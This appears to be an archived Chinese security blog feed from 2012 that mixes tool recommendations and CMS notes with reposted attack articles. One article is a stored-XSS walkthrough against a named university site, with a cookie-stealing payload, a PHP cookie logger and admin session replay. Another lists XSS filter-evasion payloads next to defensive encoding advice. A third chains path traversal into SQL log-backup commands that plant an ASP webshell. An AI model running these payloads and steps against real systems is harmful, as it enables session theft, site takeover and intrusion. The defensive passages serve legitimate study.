博客园_云和山的彼端

XSS (Cross Site Scripting) Cheat Sheet

2012-05-20T13:51:00Z

XSS (Cross Site Scripting) Cheat Sheet
Esp: for filter evasion

By RSnake

Note from the author: XSS is Cross Site Scripting. If you don't know how XSS (Cross Site Scripting) works, this page probably won't help you. This page is for people who already understand the basics of XSS attacks but want a deep understanding of the nuances regarding filter evasion. This page will also not show you how to mitigate XSS vectors or how to write the actual cookie/credential stealing/replay/session riding portion of the attack. It will simply show the underlying methodology and you can infer the rest. Also, please note my XSS page has been replicated by the OWASP 2.0 Guide in the Appendix section with my permission. However, because this is a living document I suggest you continue to use this site to stay up to date.

Also, please note that most of these cross site scripting vectors have been tested in the browsers listed at the bottom of the page, however, if you have specific concerns about outdated or obscure versions please download them from Evolt. Please see the XML format of the XSS Cheat Sheet if you intend to use CAL9000 or other automated tools. If you have an RSS reader feel free to subscribe to the Web Application Security RSS feed below, or join the forum:

Browser support reference table:

IE7.0 Vector works in Internet Explorer 7.0. Most recently tested with Internet Explorer 7.0.5700.6 RC1, Windows XP Professional SP2.
IE6.0 Vector works in Internet Explorer. Most recently tested with Internet Explorer 6.0.28.1.1106CO, SP2 on Windows 2000.
NS8.1-IE Vector works in Netscape 8.1+ in IE rendering engine mode. Most recently tested with Netscape 8.1 on Windows XP Professional. This used to be called trusted mode, but Netscape has changed it's security model away from the trusted/untrusted model and has opted towards Gecko as a default and IE as an option.
NS8.1-G Vector works in Netscape 8.1+ in the Gecko rendering engine mode. Most recently tested with Netscape 8.1 on Windows XP Professional
FF2.0 Vector works in Mozilla's Gecko rendering engine, used by Firefox. Most recently tested with Firefox 2.0.0.2 on Windows XP Professional.
O9.02 Vector works in Opera. Most recently tested with Opera 9.02, Build 8586 on Windows XP Professional
NS4 Vector works in older versions of Netscape 4.0 - untested.

Note: if a vector is not marked it either does not work or it is untested.
http://ha.ckers.org/xss.html

本文链接

渗透测试结构图

2012-05-20T13:07:00Z

2012-05-20T13:07:00Z2012-05-20T13:07:00Zjecrayhttp://www.cnblogs.com/jecray/

本文链接

[转] 推荐几个强大的火狐游览器安全方面的插件

2012-05-19T11:07:00Z

介绍几个非常有用的火狐插件。

第一个，HackBar  1.5.0，手动SQL injection的好帮手

安装地址：https://addons.mozilla.org/zh-cn/firefox/addon/3829/

用火狐打开上面的地址，直接点击“添加到 Firefox"就行了。

官方说明：Simple security audit / Penetration test tool.简单的安全审计或者渗透测试工具

第二个，Firebug  1.5.4，网站设计调试利器，专门找bug的好东东，也可以直接修改本地源代码之后应用，比如上传文件的本地js代码。和opera的”检查元素“一样的功能。

安装地址：https://addons.mozilla.org/zh-cn/firefox/addon/1843/

官方说明：Firebug 为你的 Firefox 集成了浏览网页的同时随手可得的丰富开发工具。你可以对任何网页的 CSS、HTML 和 JavaScript 进行实时编辑、调试和监控…\n\nFirebug 1.4 仅支持 Firefox 3.0 或更高版本。

第三个，Live HTTP Headers  0.16，直接post数据的好东东，是不是可以丢掉nc了？

安装地址：https://addons.mozilla.org/zh-cn/firefox/addon/3829/

官方说明：
View HTTP headers of a page and while browsing.  游览时查看页面的http 文件头。

第四个，HttpFox  0.8.8，http抓包的插件，是不是可以丢掉WSockExpert了？

安装地址：https://addons.mozilla.org/zh-CN/firefox/addon/6647/

官方说明：An HTTP analyzer addon for Firefox   一个http分析工具。

还犹豫什么，喜欢XX的就拥抱火狐吧。

以下说明属本文之一部分:

转载请保持完整并注明：转自金刀客[www.daokers.com]

本文连接:http://www.daokers.com/article/original/615.htm

本文链接

Windows Script Decoder

2012-05-19T10:43:00Z

老外的开源程序,可以解码asp encode编码.查找asp后门什么很管用.

/Files/jecray/scrdec18.rar

官方地址

http://www.virtualconspiracy.com/content/scrdec/intro

本文链接

为NBArticle更换文本编辑器

2012-05-07T15:41:00Z

各种原因,弄了很久.

最后选定了FCKeditor_2.6.7

其他编辑器都存在问题,比如不能上传文件,ewebEditor浏览器支持很差.

使用最新的CKeditor没调试成功.

NBArticle使用的模板替换技术,需要对调用的函数进行修改.

Case 1

        'FCK Editor
            Dim sBasePath
            sBasePath = SystemFolder&"editor/fck_editor/"

            Dim oFCKeditor
            Set oFCKeditor = New FCKeditor

            oFCKeditor.BasePath = sBasePath
            oFCKeditor.Width=iWindowWidth
            oFCKeditor.Height=iWindowHeight
            oFCKeditor.Value=sValue
            oFCKeditor.Config("AutoDetectLanguage") = False
            oFCKeditor.Config("DefaultLanguage")    = "zh-cn"
            oFCKeditor.Value = sValue

            sOutStr=oFCKeditor.CreateHTML("content")

本文链接

[转]XssWhulecture

2012-04-28T12:21:00Z

对武汉大学讲座网的一次xss攻击

Updated Dec 26, 2010 by hand...@gmail.com

0x01 Introduction

目前xss漏洞极其流行，在sql注入已经逐渐消失的今天，xss已经形成了新的潮流
武汉大学讲座网 http://www.whulecture.net 是新成立的网站，整个网站比较简陋，唯一存在输入的地方是“留言板”
由于特殊原因，我决定对该网站进行进行xss方面的检测

下面的内容分两部分 -- 黑盒和白盒 -- 来讲述。黑盒描述攻击过程，白盒讲解背后的原理。

0x02 黑盒部分

留言板在这里：

http://www.whulecture.net/message.php?id=c04

设置好浏览器的代理端口，启动WebScarab，在留言板输入任意内容，只要看起来能够通过审核，比如：

提交后在webscarab中捕获到所有post的字段：

修改img字段的值，填入如下内容：

"><script>document.location = 'http://localhost/test.php?cookie=' + document.cookie;</script><img

稍等片刻,我们看到本地的文件夹中已经生成了cookie.txt文件。

IP: 127.0.0.1
Date and Time: 2010-12-26 8:15:32
User Agent:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SE 2.X MetaSr 1.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; staticlogin:product=cboxf2010&act=login&info=ZmlsZW5hbWU9UG93ZXJXb3JkMjAxME94Zl9VbHRpbWF0ZS5leGUmbWFjPTZFMkRERDc1RDJDQzRGMTU5NkM4MDA4QTgzNDkzQjkyJnBhc3Nwb3J0PSZ2ZXJzaW9uPTIwMTAuNi4zLjYuMiZjcmFzaHR5cGU9MQ==&verify=473cb1f32836a477b8dd9c4df56f660d; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0)
Referer:
Cookie: PHPSESSID=6ed8c4bea052fc1d5a6064e8d0e0de73; rtime=1; ltime=1293351234948; cnzz_eid=8097710-1293176969-http://localhost/web2/admin/adm_login.php; cnzz_a2580246=47; sin2580246=none

现在我们已经拿到 管理员的cookie 了。

我们访问只有管理员才能访问的网页，比如文章管理页面：http://www.whulecture.net/admin/adm_add_lecture.php，发现被阻止了。

在webscarab中监听get数据，再次访问该页面，修改cookie字段，填入在cookie.txt中获得的cookie。点击Accept Change，发现我们已经进来了。

至此我们已经是管理员了，攻击成功。收工。

0x03 白盒部分

因为我拥有网站的源代码，所以能够以白盒的方式分析原理。

在我们进行xss攻击时，首先要看哪些地方提供输入。在黑盒部分已经看到，该留言本存在name/img/content 三个输入。经过一系列测试，可以发现name存在长度限制、content进行了标签过滤，只有img是没有进行处理，直接进入数据库的。

我们看看网站处理提交表单的源代码：

if(isset($_POST['submit'])){
$name=trim($_POST['name']);
$content=trim($_POST['content']);
$img=$_POST['img'];
if($name==''){
$name="匿名";
}
if($content=='') {
my_msg("页面内容不能为空！","message.php?id=c04");
}
else{
$content = strip_tags($content); // 仅靠strip_tags()是否足够呢？
$record = array(
'message_id' =>NULL,
'name' =>$name, //name没有任何过滤
'content' =>$content,
'img' =>$_POST['img'], // img也没有过滤
'time' =>date ( "Y-m-d H:i:s" ),
'inc' =>0
);
$id = $db->save('message',$record);

if($id){
//my_msg("留言成功，您的留言正在被验证","message.php?id=c04");
}
}
}

源代码中仅仅对content进行了处理，这是非常危险的。

再来看img为什么要修改为：

"><script>document.location = 'http://localhost/test.php?cookie=' + document.cookie;</script><img

在message.php中查看头像的源代码： <img class="avatar" src="images/pic_1.gif" width="50" height="50" />< 替换之后就是

<img class="avatar" src="images"><script>document.location = 'http://localhost/test.php?cookie=' + document.cookie;</script><img width="50" height="50" />

这就是所谓的node-splitting 攻击

当管理员返回前台查看用户留言时，它的cookie就会作为参数发送到我本地的test.php中。

test.php的内容为：

<?php

$cookie = $_GET['cookie']; //以GET方式获取cookie变量值
$ip = getenv ('REMOTE_ADDR'); //远程主机IP地址
$time=date('Y-m-d g:i:s'); //以“年-月-日时：分：秒”的格式显示时间
$referer=getenv ('HTTP_REFERER'); //链接来源
$agent = $_SERVER['HTTP_USER_AGENT']; //用户浏览器类型

$fp = fopen('cookie.txt', 'a'); //打开cookie.txt，若不存在则创建它
fwrite($fp," IP: " .$ip. "\n Date and Time: " .$time. "\n User Agent:".$agent."\n Referer: ".$referer."\n Cookie: ".$cookie."\n\n\n"); //写入文件
fclose($fp); //关闭文件

header("Location: http://www.baidu.com"); //将网页重定向到百度，增强隐蔽性

?>

这样，我们就得到了管理员的cookie，利用所谓的“session 窃取”获得了网站最高权限。

0x04 引用

XSS (Cross Site Scripting) Cheat Sheet Esp: for filter evasion http://ha.ckers.org/xss.html

本文链接

[转](原创)攻击方式学习之(1) - 跨站式脚本(Cross-Site Scripting)

2012-04-28T12:17:00Z

声明：本文仅供学习研究之用，对于本文提到的某些网站的XSS漏洞，请读者发扬高尚的人道主义精神不要去危害他人，同时希望相应的网站能够尽快修补XSS漏洞。

简介

XSS又叫CSS (Cross Site Script) ，跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码，当用户浏览该页之时，嵌入其中Web里面的html代码会被执行，从而达到恶意用户的特殊目的。

使用过ASP的同学一定见过这样的代码：

Hello,  
<%
Response.Write(Request.Querystring("name"))
%>

假如我传入的name的值为：

这样就可以直接盗取用户的cookie。所以我就可以发送一条链接地址让别人去点：

http://www.xxx.com/reg.asp?name=<script>x=document.cookie;alert(x);</script>

当然这样做没有一点隐蔽性，虽然前面的xxx.com瞒过了少数人，但大多数人可以辨认出后面的javascript代码，所以，我只需要将后面的javascript代码转换成URL的16进制，如：

http://www.xxx.com/reg.asp?name=%3C%73%63%72%69%70%74%3E%78%3D%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%61%6C%65%72%74%28%78%29%3B%3C%2F%73%63%72%69%70%74%3E

上面的URL你还认得吗？除非你把它转换出来。（进制转换可以使用Napkin工具，哎，太坏了。。有人问Napkin的下载地址，贴在这里好了：http://www.0x90.org/releases/napkin/Napkin-1.0-Windows.zip）

根本原因

1. 没有对输入进行约束，没有对输出进行编码
2. 没有严格区分“数据”和“代码”

示例

发现大名鼎鼎的淘宝网也存在这样的漏洞，我们在搜索框中输入：

"/><div style="position:absolute;left:0px;top:0px;"><iframe src="http://www.baidu.com" FRAMEBORDER=0 width=1000 height=900/></div><a href="

这样，我们已经修改了淘宝原有的页面，在下面嵌入了百度的首页。效果如图：

使用时机

我尝试在各种不同网站寻找 XSS漏洞， baidu, amazon.cn, youku.com, dangdang.com等等。结果，我发现XSS漏洞非常普遍！其实XSS利用的是网页的回显，即，接收用户的输入，然后再在页面显示用户的输入。总结一下几个可能会出现漏洞的地方：

搜索引擎
留言板
错误页面

通过在上面那些类型的页面输入一些特殊的字符（包括< > / "），如：</?jjkk>，然后在结果页中的源码处搜索是否存在原样的：</?jjkk>，如果存在，恭喜你，发现了一个XSS漏洞。

分类

1. DOM-based cross-site scripting

页面本身包含一些DOM对象的操作，如果未对输入的参数进行处理，可能会导致执行恶意脚本。如下面一些DOM操作：

document.URL
document.URLUnencoded
document.location (and many of its properties)
document.referrer
window.location (and many of its properties)

举个例子，假如某个脆弱的页面的代码如下：

<HTML>
    <TITLE>Welcome!</TITLE>
    Hi
    <SCRIPT>
        var pos=document.URL.indexOf("name=")+5;
        document.write(document.URL.substring(pos,document.URL.length));
    </SCRIPT>
    <BR>
    Welcome to our system
    …
</HTML>

攻击者使用如下的URL访问时，则非常危险：

http://www.vulnerable.site/welcome.html?name=<script>alert(document.cookie)</script>

试了一下，貌似IE、FireFox等浏览器默认对<script>alert(document.cookie)</script>进行了编码，阻止了脚本的执行。但是对于DOM操作还是要更加谨慎啊，比如把上面的页面修改一下，安全性就增强了不少：

<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
var name=document.URL.substring(pos,document.URL.length);
if (name.match(/^[a-zA-Z0-9]$/))
{
document.write(name);
}
else
{
window.alert("Security error");
}
</SCRIPT>

2. Reflected cross-site scripting

也被称为None-Persistent cross-site scripting，即，非持久化的XSS攻击，是我们通常所说的，也是最常用，使用最广的一种方式。它通过给别人发送带有恶意脚本代码参数的URL，当URL地址被打开时，特有的恶意代码参数被HTML解析、执行。它的特点是非持久化，必须用户点击带有特定参数的链接菜能引起。

3. Persistent cross-site scripting

持久化XSS攻击，指的是恶意脚本代码被存储进被攻击的数据库，当其他用户正常浏览网页时，站点从数据库中读取了非法用户存入非法数据，恶意脚本代码被执行。这种攻击类型通常在留言板等地方出现。

实施方式

我们来试一把Reflected cross-site scripting。当我们在某网站输入参数XXX，发现参数XXX原样的出现在了页面源码中：

OK，可以开始做文章了，我们将XXX替换为：abc"/><script>alert('haha')</script><a href="，返回的HTML代码如下：

<input type="text" class="Seach" name="w" value="abc"/><script>alert('haha')</script><!--" />

这样，<script>alert('haha')</script>被执行了。这里再举例一些XSS攻击行为：

<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="javascript:alert(String.fromCharCode(88,83,83))">
<IMG SRC="javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<iframe src=http://example.com/scriptlet.html <
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert(document.cookie)>
<BODY onload!#$%&()*~+-_.,:;?@[/|"]^`=alert("XSS")>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<BR SIZE="&{alert('XSS')}">
<IMG SRC='vbscript:msgbox("XSS")'>
<TABLE BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="width: expression(alert('XSS'));">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<?='<SCRIPT>alert("XSS")</SCRIPT>'?>
<A HREF="javascript:document.location='http://www.example.com/'">XSS</A>
<IMG SRC=javascript:alert('XSS')>
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
a="get";
b="URL(""";
c="javascript:";
d="alert('XSS');"")";
eval(a+b+c+d);

更加详细的列表请参见 5

危害

盗取各类用户帐号，如机器登录帐号、用户网银帐号、各类管理员帐号
控制企业数据，包括读取、篡改、添加、删除企业敏感数据的能力
盗窃企业重要的具有商业价值的资料
非法转账
强制发送电子邮件
网站挂马
控制受害者机器向其它网站发起攻击

防范

必须明确：一切输入都是有害的，不要信任一切输入的数据。
缓和XSS问题的首要法则是确定哪个输入是有效的，并且拒绝所有别的无效输入。
替换危险字符，如："&", "<", ">", """，"'", "/", "?"，";", ":", "%", "<SPACE>", "=", "+"。各种语言替换的程度不尽相同，但是基本上能抵御住一般的XSS攻击。
1. python的cgi.escape函数：
  def escape(s, quote=None):
      '''Replace special characters "&", "<" and ">" to HTML-safe sequences.
      If the optional flag quote is true, the quotation mark character (")
      is also translated.'''
      s = s.replace("&", "&") # Must be done first!
      s = s.replace("<", "<")
      s = s.replace(">", ">")
      if quote:
          s = s.replace('"', """)
  return s
2. ASP中的Server.HTMLEncode：
  <%= Server.HTMLEncode("The paragraph tag: <P>") %>
3. ASP.NET的Server.HtmlEncode及Server.UrlEncode：
  String TestString = "This is a <Test String>.";
  String EncodedString = Server.HtmlEncode(TestString);
  Server.UrlEncode(Request.Url.ToString());
4. PHP的htmlspecialchars方法：
  <?php
  $new = htmlspecialchars("<a href='test'>Test</a>", ENT_QUOTES);
  echo $new; // <a href='test'>Test</a>
  ?>
5. JAVA中的java.net.URLEncode.encode：
  String mytext = java.net.URLEncoder.encode("中国", "utf-8");
有些网站使用过滤javascript关键字的办法来防止XSS，其实是很不明智的，因为XSS有时候根本就不需要javascript关键字或者对javascript关键字进行格式变化来躲过过滤。
为所有的标记属性加上双引号。应该说这也不是万全之策，只是在转义了双引号的前提下的一道安全保障。比如：
不加双引号时，onclick被执行了：
<a href=http://www.xxx.com/detail.asp?id=2008 onclick='javascrpt:alert('haha')'>
加上了双引号，onclick不会被执行：
<a href="http://www.xxx.com/detail.asp?id=2008 onclick='javascrpt:alert('haha')'">
将数据插入到innerText属性中，脚本将不会被执行。如果是innerHTML属性，则必须确保输入是安全的。如ASP.NET中：
<%@ Page Language="C#" AutoEventWireup="true"%>
<html>
<body>
    <span id="Welcome1" runat="server"> </span>
    <span id="Welcome2" runat="server"> </span>
</body>
</html>
<script runat="server">
private void Page_Load(Object Src, EventArgs e)
{
    // Using InnerText renders the content safe–no need to HtmlEncode
    Welcome1.InnerText = "haha";
    // Using InnerHtml requires the use of HtmlEncode to make it safe
    Welcome2.InnerHtml = "Hello, " + Server.HtmlEncode("haha");
}
</Script>
使用IE6.0SP1的cookie选项HttpOnly，注意，HttpOnly只能阻止恶意脚本读取cookie，并不能阻止XSS攻击。比如在ASP.NET中：
HttpCookie cookie = new HttpCookie("Name", "ZhangChangrong");
cookie.Path = "/; HttpOnly";
Response.Cookies.Add(cookie);
使用IE的<IFrame>的Security属性，设置为restricted后，frame中的脚本将不能执行(仅限于IE)。如：
<iframe security="restricted" src="http://www.somesite.com/somepage.htm"></frame>
ASP.NET中的ValidateRequest配置选项。默认情况下，这个功能是开启的，这个功能将会检查用户是否试图在cookie、查询字符串以及HTML表格中设置HTML或脚本。如果请求包含这种潜在的危险输入，就会抛出一个HttpRequestValidationException异常。我在尝试试探当当网的XSS漏洞时发现这个异常信息，可以说当当网使用了ValidateRequest这个选项，或者从另一方面说，也许是无意中启用了这一选项，同时，将错误信息抛出给用户是非常不安全的。
1. 给一个页面设置ValidateRequest选项：
  <%@ Page Language="C#" ValidateRequest="false" %>
2. 在Machine.config中设置全局ValidateRequest选项，注意，如果在Web.config中重新设置，不会覆盖Machine.config中的这一设置：
  <system.web>
  <pages buffer="true" validateRequest="true" />
  </system.web>
3. 让我们来目睹当当网给我们带来的这一盛况：
在一些必须使用到HTML标签的地方，比如公告栏，可以使用其他格式的标示代替，比如论坛中广泛使用的BBCode，用[i]...["i]来表示斜体。
然而，对于一些允许用户输入特定HTML的地方，强烈建议使用正则表达式进行匹配。比如：
if (/^(?:["s"w"?"!","."'""]*|(?:"<"/"?(?:i|b|p|br|em|pre)">))*$/i)
{
#Cool, it's valid input
}

发现问题

查找所有包含用户输入的入口。
跟踪流入应用程序的每一个数据。
确定数据是否与输出有关系。
如果与输出有关，它是不是原始数据，是不是经过处理的？

参考资料

Michael Howard, David LeBlanc. "Writing Secure Code"
Mike Andrews, James A. Whittaker "How to Break Web Software"
http://en.wikipedia.org/wiki/Cross-site_scripting
Klein, Amit (July 4, 2005). "DOM Based Cross Site Scripting or XSS of the Third Kind". Web Application Security Consortium. Retrieved on 2008-05-28.
http://ha.ckers.org/xss.html

本文链接

【转】Web文件操作脆弱性-----下载文件功能

2012-04-28T12:16:00Z

Web脆弱性有很多种，本人也无法穷尽，本文主要是讲一下web站点实现下载文件中可能存在的问题。技术性比较差，大牛请飘过…
对于web实现下载文件功能的方法有很多种，其中有一种方法直接将文件以字节流形式，发送给客户端，而文件的路径是通过参数传入，如果此时对传入参数没有进行过滤，则可能导致下载任意文件。
该功能的asp.net代码类似如下形式：
try
{
string filename = HttpUtility.UrlDecode(Request.QueryString["filename"].ToString());
string filePath = Server.MapPath("upfile/" + filename);//路径
//以字符流的形式下载文件
System.IO.FileStream fs = new FileStream(filePath, FileMode.Open);
byte[] bytes = new byte[(int)fs.Length];
fs.Read(bytes, 0, bytes.Length);
fs.Close();
Response.ContentType = "application/octet-stream";
//通知浏览器下载文件
Response.AddHeader("Content-Disposition", "attachment; filename=" + HttpUtility.UrlEncode(fs.Name, System.Text.Encoding.UTF8));
Response.BinaryWrite(bytes);
Response.Flush();
Response.End();
}
catch
{
Response.Write("<script>alert('资料不存在！');history.back();</script>");
return;
}
上述代码没有对filename参数进行过滤，导致可以下载任意文件.这个脆弱性对于asp.Net站点是非常致命，因为在asp.net站点下有网站的配置文件web.config，通常该文件中保存着连接数据库的用户名和密码，如果获得此信息，并且远程数据库可以远程访问，那么就可以直接登录远程数据库，通过数据库的差异备份等功能就可以获得webshell.下面简单操作一下这个过程：
首先下载网站配置文件web.config
http://www.example.org/DownLoadFileLow.aspx?FileName=http://www.cnblogs.com/web.config
由于下载路径通常不是网站的根目录需要使用../回溯到网站的根目录，具体是几级回溯，需要根据具体的网站而定，这个只能是尝试，本人没有想出好的方法.
打开配置文件获得数据库连接字符串：
<add key="ConnectionStringSQL"
value="server=www.example.org;database=Dbicid2011;uid=Dbicid2011;pwd=ici48736;initial catalog=Dbicid2011" />
登录到远程数据库，使用log备份获得一句话木马：
use Dbicid2011--
drop table cmd--
alter database Dbicid2011 set recovery full--
create table cmd (a image)--
backup log Dbicid2011 to disk='D:\domains\icid2011\wwwroot\datafiles\RegistrationFiles\cmd.bak' with init --
insert into cmd (a) values(0x3C256578656375746520726571756573742822636D64222920253E)--<%execute request("cmd") %>
backup log Dbicid2011 to disk='D:\domains\icid2011\wwwroot\yxy.asp'—
(注：至于如何根据数据库获得web的绝对目录，就不再赘述)这样就完成了一次简单的渗透过程.

漏洞危害：
此漏洞危害是不言而喻的,即使远程数据库是内网数据库或者不能远程连接，该漏洞也可以使得攻击者下载任意web源文件.大大降低攻击的难度。

防范方法：
对于防范其它很简单，正常的filename参数中是不会包含../字符，（因为大部分情况下载文件在单独的一个目录中，不是网站的根目录，要想下载任意文件必须使用../回溯）只要检查参数中是否包含../，如果包含基本上就可以肯定是非法请求，直接提示，拒绝下载即可。

上述只是以asp.net为例，其实对于其它脚本也是一样，如php脚本实现该功能代码如下：
<?php
// downloading a file
$filename = $_GET['filename'];
header("Pragma: public");
header("Expires: 0"); // set expiration time
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Content-Type: application/force-download");
header("Content-Type: application/octet-stream");
header("Content-Type: application/download");
header("Content-Disposition: attachment; filename=".($filename).";");
header("Content-Transfer-Encoding: binary");
header("Content-Length: ".filesize($filename));
readfile("$filename");
echo basename($filename);
exit();
?>
基本功能类似，同样存在该问题，但是php的数据库连接文件不是固定的，需要下载几个文件才能找到，并且一般站点的mysql不允许远程连接，与上面的渗透方式有些不同，但是也可以下载源码或者系统其它配置信息，危害也已经很大了。具体的渗透过程和防范方法与上面类似，再此不在赘述。

本文链接

国内另一款很强大的开源cms we7

2012-04-15T14:32:00Z

感觉实现的原理功能和kooboo类似，但更加符合国人习惯，很好很强大。且没有采用asp.net mvc模型，对服务器的要求较低，适用性更强。

本文链接

国内一款很强大的开源cms kooboo

2012-04-11T07:38:00Z

该项目需要用vs2010 +sp 1+sql server2005以上打开，WebPlatformInstaller安装asp.net mvc3等组件。

安装起来挺麻烦，遇到了以下错误。

1. The namespace 'Kooboo.CMS.Sites.Extension.Module' is not a valid identifier

解决方法：卸载 .net framework 4.5 重新安装vs2010

2.Not supported engine for '.cshtml'

Line 60: throw new NotSupportedException(string.Format("Not supported engine for '{0}'", fileExtension));

解决方法：在kooboo.cms.web添加Kooboo.CMS.Sites.TemplateEngines.Razor.dll引用。

解决这些问题后，可以使用了，貌似很复杂啊。

本文链接

IE7.0		Vector works in Internet Explorer 7.0. Most recently tested with Internet Explorer 7.0.5700.6 RC1, Windows XP Professional SP2.
IE6.0		Vector works in Internet Explorer. Most recently tested with Internet Explorer 6.0.28.1.1106CO, SP2 on Windows 2000.
NS8.1-IE		Vector works in Netscape 8.1+ in IE rendering engine mode. Most recently tested with Netscape 8.1 on Windows XP Professional. This used to be called trusted mode, but Netscape has changed it's security model away from the trusted/untrusted model and has opted towards Gecko as a default and IE as an option.
NS8.1-G		Vector works in Netscape 8.1+ in the Gecko rendering engine mode. Most recently tested with Netscape 8.1 on Windows XP Professional
FF2.0		Vector works in Mozilla's Gecko rendering engine, used by Firefox. Most recently tested with Firefox 2.0.0.2 on Windows XP Professional.
O9.02		Vector works in Opera. Most recently tested with Opera 9.02, Build 8586 on Windows XP Professional
NS4		Vector works in older versions of Netscape 4.0 - untested.